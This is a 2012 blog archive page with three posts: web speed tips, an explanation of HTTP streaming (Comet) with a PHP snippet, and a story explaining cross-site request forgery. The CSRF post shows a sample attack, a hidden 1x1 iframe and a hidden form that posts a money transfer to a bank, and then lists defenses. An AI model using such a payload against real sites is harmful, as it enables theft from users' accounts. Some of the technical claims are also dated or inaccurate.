Welcome to my blog. GeekAndPirate is all about the web programming tricks,tools and techniques that I will be sharing with you. I will be also sharing all the tricks and techniques of hacking stuff(yeah that's true!!) I would be also interested in talking about the latest developments about the world of the WEB. So stick with me!
Monthly Archives: December 2012
December 17, 2012Posted by on
What makes a website good? Is that looks and presentation created by combination of some cool CSS and images? Or is it it’s pure functionality, what features it provides, it’s user friendliness, never mind the looks? Well, for some people, looks matters while other prefers it’s functionality. But in reality, a web developer really has to balance these things while creating web application, if he is expecting something out of it.
But having said that, many web developers ignores the speed which is a really crucial factor for judging the site’s popularity. They are too busy improving looks and functionality, that they simply overlook this important aspect. This aspect of speed is really crucial for the professional, business oriented site as the investors want to monetize their investments as much as possible, while a bad speed means potential loss of business. Many developers think that speed is not an important aspects nowadays due to faster network connections. This is however not true, coz as the bandwidth of the network is increasing, the site are more and more taking advantage of it and acting as a data hub. Ten years back, we were using dial up connections with the bandwidth of few bytes or kbs at the most, and the sites at that time were suitable to adopt that connection. We now have broadband/wireless connections having speeds in several Mbs. So now we have more data fetching site like youtube. So in short, one can not depend on the newtwork.
So what makes a site run ‘slower’? Or in other words, what one should do to make the site run ‘faster’? Well, it involves several factors. It involves both client and server side optimization.
Let’s see some of the best practices web developer must follow to improve the speed of the site.
HTTP Request –
Combine files – Combine all script files into single script where ever possible. This will result in fewer HTTP request.
CSS Sprites – Combine your background image into single image and use the CSS background-image and background-position properties to load the desired image
This is a very important factor in site’s speed. If you are able to reduce the number of HTTP request, you have almost won the battle.
Adding Cache Control header or Expiry –
If site is having some static elements which will eventually last forever, you can set far future Expires header. In this case, browser will cache that element and if the page is visited again, that element will be loaded from the browser cache rather than making a request to the server
If site contains some dynamic content, you can use appropriate Cache-Control header.
keep in mind that, if you decided to change the element, use different file name which will force the browser to make a http request for that rather than loading it from the cache. If same name is used, it will be loaded from cache and user will see old(and outdated) element.
Very few developer knows about Gzip. It is a compression method to reduct the size of the HTTP request. Client (browser) initiates request with following header –
Accept-Encoding: gzip, deflate
When server encounters this header, it compresses the response with gzip compression method. It reduces the size of the http response making it faster to travel across the network. it response with following –
Using CSS at the top –
Putting stylesheet at the top makes a page load progressively generating a good user experience. Html specification suggest that stylesheets are to be included in the <head> section. If it is placed at the bottom, user will see a white page for longer time, especially on the slower conenction, generating a bad user experience.
Load scripts Asynchronously –
According to specifications, a browser can’t download more than two elements of the page from the same domain. However, in case of scripts, it can download only one at a time. So a while a script is loading, it halts downloading of the remaining components of web page until it finishes, resulting in bad user experience. Loading scrips asynchronously make the parallel download possible, that is page does not waits for the script to get finish, but keeps on downloading the other components.
Minification is a process of removing unnecessary code from the file. It also includes removing unneeded characters, spaces, new lines, tabs and comments. This significantly reduces the size of the file resulting in reduce load time for that file
Remove Duplicate Scripts –
If proper care is not taken, there is a chance of loading the same script twice. This will not only cause an extra HTTP request, but also takes additional time to evaluate the script. This happens mainly when developer has spited the document into multiple section, the file may be accidentally duplicated on multiple places
Split Components Across Domains –
Splitting components across domains allows you to maximize parallel download possible. We can have static contains of the site like banner image, css etc reside on different domains which results in faster downloads
No HTML Image scaling–
Don’t use width and height attribute of the html <img> tag. If you are having a div of size 200 * 200, then use image of that size rather than using a bigger version of that image, for eg. 500 * 500 and scaling down that to 200 * 200. It will make page load slower.
Avoid image tag with empty src attribute –
Avoid image tag with empty src attribute, since browser will anyway request the server for the image. It will not only slow down the page response time, but will also increase the server computation time to process that request.
Use CDN –
Use Content Delivery Network(CDN) to split your content across servers spread across various geographical locations. The location of a user from server affects the speed of the site. Proximity to a server means improved speed from user’s perspective.
December 17, 2012Posted by on
I really like Gmail. In fact, I LOVE it, and I am pretty sure you too. It is simple, slick, elegant yet powerful and rich with functionality. Many of us rely on gmail for our daily business tasks.
So what’s special about gmail? It’s easy to use interface, slick design, and highly customizable options, with chat integrated right into your account…the list goes on. And the question for the geeks and tech savvy: what’s so special about gmail in web technology point of view? AJAX? JSON? Hammm…well, I won’t say you are wrong…but those are somewhat old terms now a days, and to be frank you don’t have to be an expert to know these, a high school graduate will tell you about what AJAX means, there states , response codes, how JSON is more powerful than ajax, blah blah…
So what’s the big deal? Ain’t Gmail using AJAX? Well yes….it is using ajax, but in somewhat different way. Let me give an example. You have opened your inbox, done with all your emails (read / reply/ delete/ marked as read or very less likely marked it as spam), so that you don’t have any unread mail in your inbox. You confirm this by hitting ‘refresh’ link in your inbox, which sends a request to the server to check whether there is any new mails waiting for you. This is AJAX request which client (that is your browser) initiates, which is then sent to the server, server will respond accordingly, client then will render the result by manipulating DOM, and you will see new messages in inbox if any.
Back to our question, if that was not client making periodic calls to the server in the background, then what was it?? Well, thats what HTTP STREAMING is all about, and you are using it being not aware of it! So what it is all about?
This HTTP Streaming is referred by many terms, Comet, Ajax Push, Reverse Ajax, Two Way Web, HTTP Serve Push…. So what is the basic difference with HTTP streaming and AJAX? I will just repeat briefly how AJAX works. In AJAX, client initiates a communication with server with XmlHttpRequest object to the server, server processes the request and sends the response in the format of XML, JSON or Simple HTML. Browser reads this response and manipulate the DOM, and then connection is closed. For getting the updated information, client has to re-initiate the request to the server.
But HTTP streaming (Comet) is somewhat different. It has following lifecycle-
1) Client initiates the connection with server. This can be achieve with many techniques like Hidden IFRAME, XmlHttpRequest object etc
2) Server processes the request and sends the data back to the server. But in this case, it does not closes the connection, but keeps it open and listens for any new event . If there is any new data available, it then ‘pushes’ the data back to the client. So the data is pushed back to the client as and when available, and this is called as ‘Long Polling’. This is in short a ‘Push’ technology where the publisher of the information (that is client) pushes the data, whereas, the traditional AJAX call is called as ‘Pull’ technology where client initiates the connection for getting specific data.
Comet like applications offer real time interaction by replying on a persistent HTTP connection, which acts like a stream of data between client and server, hence it is called as HTTP Streaming. This method is really useful for the modern web application where real time interaction is very vital, consider an example of share trading web application, where it is very crucial to display the share price in real time, so that a user of that application can decide to buy/sell that share accordingly.
Let’s take a simple server side example for implementing this technology. Consider the share trading app. When a request is made from the client to the server, it first process the request and then flushes the price for that share to the browser. But neither side closes the connection (client and server) and server listens for another event, in this case, change in share price. The server code will somewhat look like this:
$share_price = get_share_price();
$share_price = get_share_price();
<script>document.getElementById(‘price’).innerHTML = ‘<?php echo $share_price?>’;</script>
The <script> tag will make the browser render the share price. It then listens for change in share price in a never ending loop, and the response will be sent to the browser as and when there is a change, creating a real time system where changes are immediately communicated to the browser.
Comet like functionality can also be observed in the social networking sites like facebook where user’s wall get updated as and when any new feed is published by the server.
As web is evolving, we may see many cool and real time web applications like Gmail using comet like technologies in near future!
December 17, 2012Posted by on
I have many people from various domain in my friend circle like doctors, architects, businessmen etc. Many of them rely heavily on the internet. Naturally, they are not much aware of the potential threats on the internet. Like them, many people don’t take basic precautions like, logging out after you finish, using latest and more secured browsers, etc. Sometimes, you have to face the consequences for this lack of knowledge. Sometimes, it is not the user’s fault at all, but the developers of the website make the site vulnerable by not following good programming practice and not implementing adequate security measures, and their users has to pay for this.
At one weekend when I was hanging out with my friends, one of them told me about the incident which took place while he was performing some online transactions. He said that while he was online and was doing some transactions with his bank account, someone got unauthorized access of his account and transferred the money from his account. Luckily for him, the amount was not much, but he is now reluctant to make any online transaction.
I decided to hunt down this incident. There was no question of him giving his account details knowingly or unknowingly as he said that he doesn’t kept the password anywhere but in his brain (:)) Neither did he got phished by clicking on any unknown link which displays the site similar to the bank’s site. I asked about him what else you were browsing while you were doing those online transactions. He said that he was exploring various demand and supply forums where you make a wish for any particular video/music/software which gets fulfilled by other members of that forum.
I decided to take a look at those sites and I quickly realized that those forums by not only occupied by music and video lovers, but also by many crackers. I specially had a look at the threads visited by my friend, and I found what I was suspecting. My friend was a victim of what is called as ‘Cross Site Request Forgery’ aka (CSRF OR XSRF).
CSRF is an attack which is initiated by some user against a website. A web site in this case ‘trust’ the user which is exploited by passing some unauthorized commands while in another type of attack Cross site scripting (XSS), a user trust the site. In CSRF attacks, unauthorized users exploits the site vulnerability to get access to authorized user’s data, by passing out some commands. In this case, the authorized user is already ‘authenticated’ by the site, and it may have stored authentication info in some session cookie. Unauthorized user use this cookie to fire some unauthorized commands. Let’s see what may have happened in my friend’s case.
I viewed the html code of the forum visited by my friend, I saw in one reply, posted by some Mr. XX one html iframe tag as <iframe src=”http://xyz.com/transfer.php” width=’1′ height=’1′>
I was able to track transfer.php, and saw following code
<form name=’frm1′ action=’https://bankdomain.com/transfer’ method=’post’>
<input type=’hidden’ name=’toname’ value=’andh12′>
<input type=’hidden’ name=’amt’ value=’100′>
CSRF attacks has following characteristics
– They are made against an authenticated users exploiting site’s trust on that user
– It tricks the web browser of a user and force them to send unauthorized HTTP request
– User and browser both are tricked by in proper implementation of security measures by web application which involves authentication and authorization of user
Normal user can do very little to prevent this kind of attacks. All they can do is to avoid visiting such malicious websites, forums, and avoiding clicking on links in spam mails. Web applications are more responsible to prevent such type of attacks which can be achieved by-
– Checking the HTTP referrer header. Web app can check whether the referrer is the one it should be.
– Limiting lifetime of authentication cookies.
– Generating a user specific secret token, which the client(browser) needs to be sent with each HTTP request.
– By logging user out automatically if inactive for specific time
There are certain conditions though which must be fulfilled by the attacker in order to carry out this attack
– The attacker must force the victim to a webpage containing the malicious code while the victim is logged in.
– Attacker must identify the form submission url, and pass the exact values to those forms.
– If the site is checking for the HTTP referrer, then attacker must spoof the http referrer header.
So moral of the story is that, as a normal user you should be careful while surfing on the internet. If you are accessing some sensitive sites like bank, use a septate browser for it, and use another browser for rest of the sites. Always log off when you are done. While, if you are a web developer, you should implement the security mechanisms to counter these attacks.